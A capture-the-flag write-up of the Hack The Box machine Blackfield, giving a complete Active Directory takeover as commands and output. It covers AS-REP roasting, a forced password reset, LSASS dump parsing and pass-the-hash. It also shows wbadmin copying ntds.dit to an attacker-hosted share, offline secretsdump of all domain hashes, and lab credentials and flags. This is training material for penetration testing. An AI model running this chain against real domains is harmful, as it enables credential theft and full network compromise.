HTB Blackfield done
Blackfield
OS:
Windows
Technology:
Active Directory
SMB
LDAP
IP Address:
10.10.10.192
Open ports:
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-06 17:32:16Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Users and credentials:
support : #00^BlackKnight (AS-REP roast, cracked with hashcat)
audit2020 : PupaJana123 (reset with rpcclient; support can change its password)
svc_backup : NT hash 9658d1d1dcd9250115e2205d9f48400d (from lsass.DMP, pass-the-hash over WinRM)
Administrator : NT hash 184fb5e5178480be64824d4cd53b99ee (from ntds.dit)
Nmap
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ sudo nmap -Pn -A -sV --script=default,vuln -p- --open -oA 10.10.10.192_nmap_vulns 10.10.10.192
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-06 05:29 EDT
Nmap scan report for 10.10.10.192
Host is up (0.038s latency).
Not shown: 65527 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-06 17:32:16Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-054: false
|_clock-skew: 7h59m58s
| smb2-time:
| date: 2023-04-06T17:32:26
|_ start_date: N/A
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 37.75 ms 10.10.14.1
2 37.78 ms 10.10.10.192
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 448.65 seconds
Add the domain name to /etc/hosts (nmap reported the DC's host name as DC01, so dc01.blackfield.local can go on the same line to avoid a DNS dependency later)
┌──(root㉿kali)-[~]
└─# echo "10.10.10.192 blackfield.local" >> /etc/hosts
List SMB shares as guest (null session)
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ smbmap -u guest -H 10.10.10.192
[+] IP: 10.10.10.192:445 Name: 10.10.10.192
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
profiles$ READ ONLY
SYSVOL NO ACCESS Logon server share
List the profiles$ share. It holds one directory per domain user, so the listing doubles as a username list; awk '{print $1}' keeps the first column but also captures ".", ".." and the trailing blocks summary, which is what triggers the "invalid principal syntax" error further down.
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ smbclient -N \\\\10.10.10.192\\profiles$ -c ls | awk '{print $1}' > smb_users.txt
AS-REP roast: request an AS-REP for every name in the list without pre-authentication. Accounts with "Do not require Kerberos preauthentication" set return an AS-REP whose encrypted part can be cracked offline (the $krb5asrep$23$ line); KDC_ERR_C_PRINCIPAL_UNKNOWN lines are names that do not exist and are filtered out.
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ /home/kali/.local/bin/GetNPUsers.py blackfield.local/ -no-pass -usersfile smb_users.txt -dc-ip 10.10.10.192 | grep -v 'KDC_ERR_C_PRINCIPAL_UNKNOWN' | tee kerberos_preauth_disable_users
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:d8777c4e3bc6a689e9c1804df5233acb$cf181be7f186b65319e96085e89634181a59dd5af180098bab08f19f9f994477b710aebbec578aaf74186361afc390828e73e406df2f67b0fc8f27d53648a4f8a68bcca3dfa2d2fbc291079a6d43ffbe274c1f86fe11841a9e4b3ded4dac712a877d78b55263858f7d33f38cd775097711540adde2d0f15c3440f2feb5f714f6890cb623d1c3d33ba250c4752473c05db51cea08b5852ca984ae13fb4bf2412ff3b0f8c31c1dae5fd06227816d54dae74fedaa08356dffcc9e570e3337e18164b943477ffdad2de5715b79049b4bd611fe6fd913f8f4a7a77c3b446e4c2df4a2648e13457aa789633220d32f3becacc6d739d99f
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax
Crack the AS-REP hash with hashcat (mode 18200). --show only prints the entry already in the potfile, so the same command without --show has to run first.
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ hashcat -m 18200 krb5asrep_hash /usr/share/wordlists/rockyou.txt --show
$krb5asrep$23$support@BLACKFIELD.LOCAL:d8777c4e3bc6a689e9c1804df5233acb$cf181be7f186b65319e96085e89634181a59dd5af180098bab08f19f9f994477b710aebbec578aaf74186361afc390828e73e406df2f67b0fc8f27d53648a4f8a68bcca3dfa2d2fbc291079a6d43ffbe274c1f86fe11841a9e4b3ded4dac712a877d78b55263858f7d33f38cd775097711540adde2d0f15c3440f2feb5f714f6890cb623d1c3d33ba250c4752473c05db51cea08b5852ca984ae13fb4bf2412ff3b0f8c31c1dae5fd06227816d54dae74fedaa08356dffcc9e570e3337e18164b943477ffdad2de5715b79049b4bd611fe6fd913f8f4a7a77c3b446e4c2df4a2648e13457aa789633220d32f3becacc6d739d99f:#00^BlackKnight
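The two parsing steps above (turning the profiles$ listing into a username list, and keeping only the roastable lines from the GetNPUsers.py output) as one added shell example. This is not code from the original writeup; the smbclient listing and GetNPUsers output it uses are constructed from the lines on this page (hash truncated), and it assumes smbclient's default ls layout (name, attribute flags, size, timestamp) and Impacket's default hashcat-style $krb5asrep$23$user@REALM:... output.

```shell
#!/bin/sh
# Added example, not from the original writeup. POSIX sh + awk, no network needed.

# Constructed sample of `smbclient -N \\\\10.10.10.192\\profiles$ -c ls` output.
sample_listing() {
cat <<'EOF'
  .                                   D        0  Wed Jun  3 11:47:12 2020
  ..                                  D        0  Wed Jun  3 11:47:12 2020
  audit2020                           D        0  Wed Jun  3 11:47:12 2020
  support                             D        0  Wed Jun  3 11:47:12 2020
  svc_backup                          D        0  Wed Jun  3 11:47:12 2020

		5102079 blocks of size 4096. 1688568 blocks available
EOF
}

# Constructed sample of GetNPUsers.py output (hash truncated for readability).
sample_npusers() {
cat <<'EOF'
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:d8777c4e3bc6a689e9c1804df5233acb$cf181be7f186b65319e96085e89634181a59dd5af180098bab08f19f9f994477
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax
EOF
}

# One candidate username per line. A plain `awk '{print $1}'` also emits ".",
# ".." and the "blocks of size" summary, which is what produced the
# "invalid principal syntax" error in the writeup; this drops them.
# Names containing spaces are not handled (rare for profile directories).
smbclient_to_users() {
  awk '
    /blocks of size/        { next }      # free-space summary line
    NF < 2                  { next }      # blank lines
    $1 == "." || $1 == ".." { next }      # self/parent directory entries
    $2 ~ /^[A-Z]+$/         { print $1 }  # 2nd column is the attribute flags (D, A, DHS, ...)
  ' | LC_ALL=C sort -u
}

# Keep only lines hashcat -m 18200 accepts: $krb5asrep$23$user@REALM:<32 hex>$<hex>.
# The "[-] ..." status lines printed by GetNPUsers.py are dropped.
asrep_hashes() {
  grep -E '^\$krb5asrep\$23\$[^@:]+@[^:]+:[0-9a-f]{32}\$[0-9a-f]+$'
}

# Stand-alone demo: the cleaned user list, then the hashcat input.
sample_listing | smbclient_to_users
sample_npusers | asrep_hashes
```

Redirecting asrep_hashes into a file gives hashcat clean input, and because the user list no longer carries "." and "..", the "invalid principal syntax" line does not appear at all.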
Run BloodHound (collector: bloodhound-python on Kali; the GUI package comes from apt). Note the "Kerberos auth to LDAP failed, trying NTLM" lines: nmap reported about 8 h of clock skew and Kerberos rejects anything beyond 5 min by default, so any step that must use Kerberos needs the clock synced against the DC (ntpdate) or the tool run under faketime.
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ sudo apt install bloodhound
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ pip3 install bloodhound
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ bloodhound-python -u support -p '#00^BlackKnight' -d blackfield.local -ns 10.10.10.192 -c DcOnly | tee bloodhound.txt
INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 18 computers
INFO: Found 0 trusts
INFO: Done in 00M 05S
Read the support user's outbound rights in BloodHound: support holds ForceChangePassword over audit2020, so audit2020's password can be reset without knowing the current one.
Reset audit2020's password with rpcclient (setuserinfo level 23 sets the password over SAMR). This is a destructive change: the old password is gone and the account's owner is locked out until told, so on a real engagement it needs explicit authorisation and a record of what was changed.
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ rpcclient -U blackfield/support 10.10.10.192
Password for [BLACKFIELD\support]:
rpcclient $> setuserinfo audit2020 23 PupaJana123
rpcclient $> exit
List SMB shares for user audit2020
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ smbmap -u audit2020 -p PupaJana123 -H 10.10.10.192
[+] IP: 10.10.10.192:445 Name: blackfield.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic READ ONLY Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server share
Same check with crackmapexec, which also confirms the OS build, that SMB signing is required and that SMBv1 is off
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ crackmapexec smb 10.10.10.192 -u audit2020 -p 'PupaJana123' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:PupaJana123
SMB 10.10.10.192 445 DC01 [+] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic READ Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share
Browse the forensic share as audit2020
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ smbclient -U audit2020 \\\\10.10.10.192\\forensic
Password for [WORKGROUP\audit2020]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Feb 23 08:03:16 2020
.. D 0 Sun Feb 23 08:03:16 2020
commands_output D 0 Sun Feb 23 13:14:37 2020
memory_analysis D 0 Thu May 28 16:28:33 2020
tools D 0 Sun Feb 23 08:39:08 2020
5102079 blocks of size 4096. 1688568 blocks available
smb: \> cd memory_analysis\
smb: \memory_analysis\> dir
. D 0 Thu May 28 16:28:33 2020
.. D 0 Thu May 28 16:28:33 2020
conhost.zip A 37876530 Thu May 28 16:25:36 2020
ctfmon.zip A 24962333 Thu May 28 16:25:45 2020
dfsrs.zip A 23993305 Thu May 28 16:25:54 2020
dllhost.zip A 18366396 Thu May 28 16:26:04 2020
ismserv.zip A 8810157 Thu May 28 16:26:13 2020
lsass.zip A 41936098 Thu May 28 16:25:08 2020
mmc.zip A 64288607 Thu May 28 16:25:25 2020
RuntimeBroker.zip A 13332174 Thu May 28 16:26:24 2020
ServerManager.zip A 131983313 Thu May 28 16:26:49 2020
sihost.zip A 33141744 Thu May 28 16:27:00 2020
smartscreen.zip A 33756344 Thu May 28 16:27:11 2020
svchost.zip A 14408833 Thu May 28 16:27:19 2020
taskhostw.zip A 34631412 Thu May 28 16:27:30 2020
winlogon.zip A 14255089 Thu May 28 16:27:38 2020
wlms.zip A 4067425 Thu May 28 16:27:44 2020
WmiPrvSE.zip A 18303252 Thu May 28 16:27:53 2020
5102079 blocks of size 4096. 1688568 blocks available
smb: \memory_analysis\> get lsass.zip
getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip (1136.6 KiloBytes/sec) (average 1136.6 KiloBytes/sec)
smb: \memory_analysis\>
Unzip lsass.zip and parse the minidump with pypykatz. The forensic share holds a memory dump of the DC's LSASS process, so every account that had a logon session when the dump was taken can be recovered from it.
┌──(kali㉿kali)-[/mnt/…/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield/lsass]
└─$ pypykatz lsa minidump lsass.DMP | tee lsass_clear_text_dump
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef621
...
Validate the svc_backup NT hash by pass-the-hash over WinRM (no password needed; "Pwn3d!" means the account can execute commands on DC01)
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ crackmapexec winrm 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
[*] Initializing RDP protocol database
[*] Initializing FTP protocol database
[*] Old configuration file detected, replacing with new version
SMB 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)
Flag: user.txt
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> dir
*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> dir
Directory: C:\Users\svc_backup\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2020 2:26 PM 32 user.txt
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> type user.txt
3920bb317a0bef51027e2852be64b543
*Evil-WinRM* PS C:\Users\svc_backup\Desktop>
Dumping hashes with wbadmin. svc_backup is a member of Backup Operators, which grants SeBackupPrivilege: wbadmin snapshots the volume (VSS) and copies C:\Windows\NTDS\ntds.dit even though LSASS keeps the live file locked, and it does not need read ACLs on the file. The backup target is an SMB share hosted on Kali.
Create the share with Samba (stanza appended to /etc/samba/smb.conf; "force user" makes every write land as the local smbuser account)
[samba]
comment = hacker welcome
path = /mnt/hgfs/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield/samba/
guest ok = yes
read only = no
browsable = yes
force user = smbuser
Create user and samba user
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ sudo adduser smbuser
Adding user `smbuser' ...
Adding new group `smbuser' (1002) ...
Adding new user `smbuser' (1002) with group `smbuser (1002)' ...
Creating home directory `/home/smbuser' ...
Copying files from `/etc/skel' ...
New password:
Retype new password:
passwd: password updated successfully
Changing the user information for smbuser
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n] Y
Adding new user `smbuser' to supplemental / extra groups `users' ...
Adding user `smbuser' to group `users' ...
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ sudo smbpasswd -a smbuser
New SMB password:
Retype new SMB password:
Added user smbuser.
Restart smb service
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ systemctl restart smbd.service ; systemctl status smbd.service
● smbd.service - Samba SMB Daemon
Loaded: loaded (/lib/systemd/system/smbd.service; disabled; preset: disabled)
Active: active (running) since Fri 2023-04-07 07:48:18 EDT; 19ms ago
Docs: man:smbd(8)
man:samba(7)
man:smb.conf(5)
Process: 297584 ExecCondition=/usr/share/samba/is-configured smb (code=exited, status=0/SUCCESS)
Process: 297586 ExecStartPre=/usr/share/samba/update-apparmor-samba-profile (code=exited, status=0/SUCCESS)
Main PID: 297590 (smbd)
Status: "smbd: ready to serve connections..."
Tasks: 3 (limit: 10088)
Memory: 5.5M
CPU: 113ms
CGroup: /system.slice/smbd.service
├─297590 /usr/sbin/smbd --foreground --no-process-group
├─297592 /usr/sbin/smbd --foreground --no-process-group
└─297593 /usr/sbin/smbd --foreground --no-process-group
Apr 07 07:48:18 kali systemd[1]: Starting smbd.service - Samba SMB Daemon...
Apr 07 07:48:18 kali systemd[1]: Started smbd.service - Samba SMB Daemon.
Map the Kali share as drive L: from the WinRM shell (smbuser's password is given inline)
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> net use l: \\10.10.14.6\samba /user:smbuser dupa
The command completed successfully.
Back up C:\Windows\NTDS to the Kali share (echo Y answers the confirmation prompt)
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> echo "Y" | wbadmin start backup -backuptarget:\\10.10.14.6\samba -include:c:\windows\ntds
wbadmin 1.0 - Backup command-line tool
(C) Copyright Microsoft Corporation. All rights reserved.
Note: The backed up data cannot be securely protected at this destination.
Backups stored on a remote shared folder might be accessible by other
people on the network. You should only save your backups to a location
where you trust the other users who have access to the location or on a
network that has additional security precautions in place.
Retrieving volume information...
This will back up (C:) (Selected Files) to \\10.10.14.6\samba.
Do you want to start the backup operation?
[Y] Yes [N] No Y
The backup operation to \\10.10.14.6\samba is starting.
Creating a shadow copy of the volumes specified for backup...
Please wait while files to backup for volume (C:) are identified.
This might take several minutes.
Creating a shadow copy of the volumes specified for backup...
Please wait while files to backup for volume (C:) are identified.
This might take several minutes.
Scanning the file system...
Please wait while files to backup for volume (C:) are identified.
This might take several minutes.
Found (11) files.
Scanning the file system...
Found (11) files.
Scanning the file system...
Found (11) files.
Scanning the file system...
Found (11) files.
Creating a backup of volume (C:), copied (100%).
Creating a backup of volume (C:), copied (100%).
Summary of the backup operation:
------------------
The backup operation successfully completed.
The backup of volume (C:) completed successfully.
Log of files successfully backed up:
C:\Windows\Logs\WindowsServerBackup\Backup-07-04-2023_18-43-29.log
Recover ntds.dit from that backup. wbadmin get versions lists every registered backup; the 9/21/2020 entry pointing at \\10.10.14.4\blackfieldA is an older backup already registered on the host, and the 04/08/2023-03:13 version is the one just created. -notrestoreacl drops the original ACLs so the restored copy is readable by svc_backup.
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> wbadmin get versions
wbadmin 1.0 - Backup command-line tool
(C) Copyright Microsoft Corporation. All rights reserved.
Backup time: 9/21/2020 4:00 PM
Backup location: Network Share labeled \\10.10.14.4\blackfieldA
Version identifier: 09/21/2020-23:00
Can recover: Volume(s), File(s)
Backup time: 4/7/2023 8:13 PM
Backup location: Network Share labeled \\10.10.14.6\samba
Version identifier: 04/08/2023-03:13
Can recover: Volume(s), File(s)
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> echo "Y" | wbadmin start recovery -version:04/08/2023-03:13 -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl
wbadmin 1.0 - Backup command-line tool
(C) Copyright Microsoft Corporation. All rights reserved.
Retrieving volume information...
You have chosen to recover the file(s) c:\windows\ntds\ntds.dit from the
backup created on 4/7/2023 8:13 PM to C:\.
Preparing to recover files...
Do you want to continue?
[Y] Yes [N] No Y
Running the recovery operation for c:\windows\ntds\ntds.dit, copied (54%).
Currently recovering c:\windows\ntds\ntds.dit.
Successfully recovered c:\windows\ntds\ntds.dit to C:\.
The recovery operation completed.
Summary of the recovery operation:
--------------------
Recovery of c:\windows\ntds\ntds.dit to C:\ successfully completed.
Total bytes recovered: 18.00 MB
Total files recovered: 1
Total files failed: 0
Log of files successfully recovered:
C:\Windows\Logs\WindowsServerBackup\FileRestore-08-04-2023_03-23-42.log
Save the SYSTEM hive (secretsdump needs its boot key to decrypt the PEK, and the PEK decrypts the hashes) and copy ntds.dit and system.hive to Kali over the mapped drive
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> reg save HKLM\SYSTEM C:\system.hive
The operation completed successfully.
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cd c:\
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/26/2020 5:38 PM PerfLogs
d----- 6/3/2020 9:47 AM profiles
d-r--- 3/19/2020 11:08 AM Program Files
d----- 2/1/2020 11:05 AM Program Files (x86)
d-r--- 2/23/2020 9:16 AM Users
d----- 9/21/2020 4:29 PM Windows
-a---- 2/28/2020 4:36 PM 447 notes.txt
-a---- 4/7/2023 8:13 PM 18874368 ntds.dit
-a---- 4/7/2023 8:36 PM 17600512 system.hive
*Evil-WinRM* PS C:\> copy ntds.dit l:
*Evil-WinRM* PS C:\> copy system.hive l:
*Evil-WinRM* PS C:\> l:
*Evil-WinRM* PS l:\> dir
Directory: l:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/7/2023 4:41 AM WindowsImageBackup
------ 4/7/2023 8:13 PM 18874368 ntds.dit
------ 4/7/2023 1:37 PM 17600512 system.hive
Dump the domain hashes offline with secretsdump (LOCAL parses the files; no connection to the DC is made)
┌──(kali㉿kali)-[/mnt/…/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield/samba]
└─$ /home/kali/.local/bin/secretsdump.py -ntds ntds.dit -system system.hive LOCAL
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:258d1995ab2aa3b000fb319f02250429:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:55a7781157b1cc3f809d493ba73f33e0:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
...
Flag: root.txt
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2020 4:36 PM 447 notes.txt
-a---- 11/5/2020 8:38 PM 32 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type notes.txt
Mates,
After the domain compromise and computer forensic last week, auditors advised us to:
- change every passwords -- Done.
- change krbtgt password twice -- Done.
- disable auditor's account (audit2020) -- KO.
- use nominative domain admin accounts instead of this one -- KO.
We will probably have to backup & restore things later.
- Mike.
PS: Because the audit report is sensitive, I have encrypted it on the desktop (root.txt)
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
4375a629c7c67c8e29db269060c955cb